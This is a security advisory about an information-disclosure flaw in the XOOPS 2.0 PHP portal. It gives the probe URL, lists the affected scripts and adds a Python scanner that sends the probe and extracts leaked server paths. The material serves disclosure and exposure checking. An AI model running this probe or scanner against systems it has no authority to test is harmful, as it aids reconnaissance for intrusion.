


XOOPS path disclosure



20th Mar 2003 [SBWID-6076]
COMMAND

	XOOPS path disclosure

SYSTEMS AFFECTED

	XOOPS VERSIONS: v2.0 (and prior ?)

PROBLEM

	Grégory Le Bras aka GaLiaRePt [http://www.Security-Corporation.com],
	Security Corporation Security Advisory [SCSA-011] :
	
	 http://www.security-corporation.com/index.php?id=advisories&a=011-FR
	
	
	 DESCRIPTION
	 ________________________________________________________________________
	
	XOOPS is "a dynamic OO (Object Oriented) based open source portal script
	written in PHP. XOOPS is the ideal tool for developing small to large
	dynamic community websites, intra company portals, corporate portals,
	weblogs and much more." (direct quote from XOOPS website)
	
	
	 DETAILS & EXPLOITS
	 ________________________________________________________________________
	
	¤ Details Path Disclosure :
	
	A vulnerability has been found in XOOPS which allows attackers to
	determine the physical path of the application on the server.
	
	This vulnerability would allow a remote user to determine the full path
	to the web root directory and other potentially sensitive information.
	It can be triggered by a remote user submitting a specially crafted HTTP
	request that supplies an unexpected value for the "xoopsOption" request
	parameter, which the affected scripts use as the $xoopsOption variable.
	
	Note: a query-string parameter can only overwrite a PHP variable named
	$xoopsOption when PHP's register_globals setting is enabled, and a path
	disclosed through PHP's error output only reaches the remote user when
	display_errors is on. Installations with display_errors off (errors
	written to the server log instead) still hit the error but do not show
	the path to the client. Both settings are therefore worth checking when
	assessing exposure.
	
	¤ Exploits Path Disclosure :
	
	http://[target]/index.php?xoopsOption=any_word
	
	Affected files:
	
	admin.php
	edituser.php
	footer.php
	header.php
	image.php
	lostpass.php
	pmlite.php
	readpmsg.php
	register.php
	search.php
	user.php
	userinfo.php
	viewpmsg.php
	class/xoopsblock.php
	modules/contact/index.php
	modules/mydownloads/index.php
	modules/mydownloads/brokenfile.php
	modules/mydownloads/modfile.php
	modules/mydownloads/ratefile.php
	modules/mydownloads/singlefile.php
	modules/mydownloads/submit.php
	modules/mydownloads/topten.php
	modules/mydownloads/viewcat.php
	modules/mylinks/brokenlink.php
	modules/mylinks/index.php
	modules/mylinks/modlink.php
	modules/mylinks/ratelink.php
	modules/mylinks/singlelink.php
	modules/mylinks/submit.php
	modules/mylinks/topten.php
	modules/mylinks/viewcat.php
	modules/newbb/index.php
	modules/newbb/search.php
	modules/newbb/viewforum.php
	modules/newbb/viewtopic.php
	modules/news/archive.php
	modules/news/article.php
	modules/news/index.php
	modules/sections/index.php
	modules/system/admin.php
	modules/xoopsfaq/index.php
	modules/xoopsheadlines/index.php
	modules/xoopsmembers/index.php
	modules/xoopspartners/index.php
	modules/xoopspartners/join.php
	modules/xoopspoll/index.php
	modules/xoopspoll/pollresults.php
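	The following checker is an added example for this advisory; it is not
	code from Security Corporation or from the XOOPS project. It builds the
	probe above (?xoopsOption=any_word) for a subset of the affected files,
	and extracts absolute paths from any standard PHP diagnostic in the
	response ("... in /abs/path/file.php on line N", wrapped in <b> tags when
	html_errors is on). The base URL, the probe value and the sample response
	are assumptions: the sample is constructed for the offline demo and does
	not reproduce what a real XOOPS 2.0 host prints.

```python
"""Probe a XOOPS install for the xoopsOption path disclosure (SCSA-011)
and pull leaked filesystem paths out of the responses.

Added example, not advisory or XOOPS code. Assumes only that a leaking
response carries PHP's standard diagnostic format; the sample response is
constructed, not captured from a real host.
"""
import re
import sys
import urllib.parse
import urllib.request

# Subset of the affected files listed in the advisory (relative to the XOOPS root).
AFFECTED_FILES = [
    "index.php", "admin.php", "edituser.php", "header.php", "lostpass.php",
    "register.php", "search.php", "user.php", "userinfo.php",
    "modules/news/index.php", "modules/newbb/index.php",
]

# PHP prints "<level>: <message> in <file> on line <n>"; with html_errors=On
# the level, file and line are wrapped in <b>...</b>. Paths containing spaces
# are truncated at the space by [^<\s]+, which is acceptable for a scanner.
_PHP_DIAG = re.compile(
    r"(?:Warning|Notice|Fatal error|Parse error)(?:</b>)?:\s*(?P<msg>.*?)\s+in\s+"
    r"(?:<b>)?(?P<path>(?:/|[A-Za-z]:\\)[^<\s]+)(?:</b>)?\s+on\s+line\s+"
    r"(?:<b>)?(?P<line>\d+)",
    re.IGNORECASE | re.DOTALL,
)


def extract_paths(body):
    """Return every PHP diagnostic in a response body as {path, line, message}."""
    found = []
    for m in _PHP_DIAG.finditer(body):
        found.append({
            "path": m.group("path"),
            "line": int(m.group("line")),
            "message": re.sub(r"<[^>]+>", "", m.group("msg")).strip(),
        })
    return found


def guess_root(paths):
    """Longest common directory prefix of leaked paths: the XOOPS install dir."""
    split = [re.split(r"[\\/]", p)[:-1] for p in paths]  # drop the file names
    if not split:
        return ""
    common = []
    for parts in zip(*split):
        if len(set(parts)) != 1:
            break
        common.append(parts[0])
    sep = "\\" if "\\" in paths[0] else "/"
    return sep.join(common) or sep


def probe_urls(base_url, files=AFFECTED_FILES, value="any_word"):
    """Build the advisory's probe (?xoopsOption=<value>) for each affected file."""
    base = base_url.rstrip("/") + "/"
    query = urllib.parse.urlencode({"xoopsOption": value})
    return [base + f + "?" + query for f in files]


def fetch(url, timeout=10):
    """GET one probe URL and return the body as text (PHP warnings are plain text)."""
    req = urllib.request.Request(url, headers={"User-Agent": "xoops-pathcheck"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def scan(base_url):
    """Probe every affected file; map each leaked path to the URL that leaked it."""
    leaks = {}
    for url in probe_urls(base_url):
        try:
            body = fetch(url)
        except Exception as exc:  # unreachable host, 404 on a missing module, ...
            print(f"[!] {url}: {exc}", file=sys.stderr)
            continue
        for diag in extract_paths(body):
            leaks.setdefault(diag["path"], url)
    return leaks


# Constructed sample of a leaking response with display_errors=On and
# html_errors=On. The messages are illustrative PHP diagnostics, not what
# XOOPS itself emits (the advisory does not reproduce the real output).
SAMPLE_RESPONSE = (
    "<br />\n<b>Warning</b>:  Invalid argument supplied for foreach() in "
    "<b>/var/www/html/xoops/header.php</b> on line <b>42</b><br />\n"
    "<br />\n<b>Notice</b>:  Undefined index: pagetype in "
    "<b>/var/www/html/xoops/modules/news/index.php</b> on line <b>17</b><br />\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python3 xoops_pathcheck.py http://target/xoops
        for path, url in scan(sys.argv[1]).items():
            print(f"{url} -> {path}")
    else:  # offline demo on the constructed sample
        leaked = extract_paths(SAMPLE_RESPONSE)
        for diag in leaked:
            print(diag)
        print("guessed install root:", guess_root([d["path"] for d in leaked]))
```

	Run with a base URL to scan a host, or with no arguments to see the
	extraction on the constructed sample. The same extract_paths() routine
	works on a saved response or a proxy log, so a host that only leaks on
	one of the listed files is still caught as long as that file is probed.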
	

SOLUTION

	None yet

